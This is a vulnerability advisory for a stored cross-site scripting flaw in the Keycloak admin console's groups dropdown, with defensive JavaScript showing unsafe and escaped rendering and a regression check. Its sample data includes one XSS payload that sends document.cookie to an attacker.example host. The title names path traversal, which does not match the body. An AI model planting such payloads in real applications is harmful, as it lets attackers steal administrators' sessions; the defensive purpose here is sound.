Lack of data validation - Path Traversal In org.keycloak:keycloak-core

Description

Stored Cross-Site Scripting (XSS) in Keycloak via groups dropdown

Summary

A Stored XSS vulnerability was reported to the Keycloak Security mailing list, affecting all versions of Keycloak including the latest release at the time (16.0.1). The vulnerability allows a privileged attacker to execute malicious scripts in the admin console by abusing the groups dropdown: an attacker with permission to create or rename groups stores a script in a group name, and the script runs in the browser of any other admin whose console renders that dropdown.

Impact

Successful exploitation lets a privileged attacker store a script that executes in the admin console sessions of other users and steal data from them (for example, admin session material or data visible in the console). The impact is considered moderate to low, since privileged credentials are required to plant the payload.
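The pattern behind this class of bug, as an added example that is not Keycloak's code: a dropdown renderer that concatenates a stored group name straight into markup (the vulnerable form), beside a renderer that encodes each untrusted value for the HTML context it lands in. The group names, the payload, and the function names are all constructed for illustration; the actual sink in the Keycloak admin console is not shown on this page.

```javascript
// Added example, not code from Keycloak. Models a stored-XSS sink in an
// admin-console groups dropdown and its hardened form. Assumption: group
// names are saved verbatim by a privileged user and later rendered into
// the DOM of other admins' browsers.

// Constructed sample group names; the third one is a stored payload.
const groupNames = [
  "engineering",
  "ops",
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

// Vulnerable pattern: untrusted names concatenated into markup that the
// page later assigns to innerHTML. The payload's <img onerror=...> survives.
function renderGroupOptionsUnsafe(names) {
  return names.map((n) => `<option value="${n}">${n}</option>`).join("");
}

// Minimal HTML entity encoder, safe for element text and for values placed
// inside double-quoted attributes. Other contexts (URL, JS, CSS) need their
// own encoders; this one is not sufficient there.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Hardened pattern: every untrusted value encoded for the context it lands in.
function renderGroupOptionsSafe(names) {
  return names
    .map((n) => `<option value="${escapeHtml(n)}">${escapeHtml(n)}</option>`)
    .join("");
}

// Regression check: markup built from group names must never contain a
// raw tag that originated in a name. Only the <option> tags we emit may
// appear unencoded.
function containsRawTag(markup) {
  return /<(img|script|svg|iframe)\b/i.test(markup);
}

// Where a DOM is available, the better fix is to avoid HTML parsing of the
// name entirely (shown as a comment; there is no DOM in Node):
//   const opt = document.createElement("option");
//   opt.value = n; opt.textContent = n; select.appendChild(opt);

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe contains raw tag:", containsRawTag(renderGroupOptionsUnsafe(groupNames)));
  console.log("safe contains raw tag:  ", containsRawTag(renderGroupOptionsSafe(groupNames)));
}
```

The check `containsRawTag` is the kind of assertion to add to a UI test suite for any list that renders admin-supplied strings: seed one entry with a tag-bearing name, render, and fail if the tag reaches the markup unencoded. Encoding is context-dependent, so the same group name rendered into a URL or into an inline event handler needs a different encoder than the one above.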

References

    Please refer to the Keycloak Security mailing list for more information.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.
